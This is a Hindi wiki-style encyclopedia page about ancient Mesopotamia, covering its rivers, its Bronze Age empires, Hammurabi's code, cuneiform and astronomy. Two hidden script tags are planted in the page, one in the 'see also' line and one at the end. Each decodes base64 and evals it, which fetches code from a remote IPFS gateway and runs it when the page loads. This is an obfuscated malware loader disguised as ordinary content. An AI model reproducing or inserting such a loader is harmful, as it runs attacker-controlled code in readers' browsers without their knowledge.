मेसोपोटामिया

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 09:20, 22 मार्च 2015 का अवतरण (''''मेसोपोटामिया''' (अंग्रेज़ी: ''Mesopotamia'') प्राचीन सभ्यता ...' के साथ नया पन्ना बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

मेसोपोटामिया (अंग्रेज़ी: Mesopotamia) प्राचीन सभ्यता से जुड़ा एक महत्त्वपूर्ण इलाक़ा है। यह एक कांस्य युगीन सभ्यता थी। यह इलाक़ा दजला[1] और फरात[2] नदियों के बीच के क्षेत्र में पड़ता है। इसमें आधुनिक इराक़, उत्तर-पूर्वी सीरिया, दक्षिण-पूर्वी तुर्की तथा ईरान का क़ुज़ेस्तान प्रांत के क्षेत्र सम्मिलित हैं।

कांस्य युगीन सभ्यता

यह कांस्य युगीन सभ्यता का उद्गम स्थल माना जाता है। यहाँ सुमेर, अक्कदी सभ्यता, बेबीलोन तथा असीरिया के साम्राज्य अलग-अलग समय में स्थापित हुये थे। मेसोपोटामिया हज़ारों साल तक एक कृषि प्रधान समाज था। उसके बाद ही वह एक आधुनिक राज्य के रूप में उभरा।

विशेषताएँ

  • हम्मूराबी बेबीलोन का महान शासक था। उसने 'क़ानून की संहिता' बनाई थी।
  • मेसोपोटामिया के लोगों का मुख्य व्यवसाय कृषि था। कुम्हार के चाक का प्रयोग सर्वप्रथम इसी सभ्यता में हुआ।
  • सुमेरियन लोगों ने 'क्यूनिफार्म लिपि' विकसित की थी। सबसे पहले एक ब्रिटिश अफसर हेनरी रॉलिन्सन ने इसे इसे पढ़ा था।
  • पाइथोगोरस प्रमेय भी मेसोपोटामिया सभ्यता की ही देन है।
  • इस सभ्यता के लोग खगोलविद्या में भी निपुण थे। इन लोगों ने दिन और रात की लम्बाई की गणना की तथा सूर्य और चन्द्रमा के उदय व अस्त होने के समय की गणना की।
  • यहाँ के खगोलविदों ने एक दिन को 24 घण्टों में बाँटा। उन्होंने आकाश को 12 हिस्सों में बाँटा व प्रत्येक को एक नाम दिया। इन्हें राशियाँ कहा गया। चन्द्र कलैण्डर भी इनके द्वारा बनाया गया।


इन्हें भी देखें<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>: हड़प्पा, मोहनजोदाड़ो, चन्हूदड़ों, हड़प्पा समाज और संस्कृति एवं सिन्धु लिपि


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. टिगरिस
  2. इयुफ़्रेटीस

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>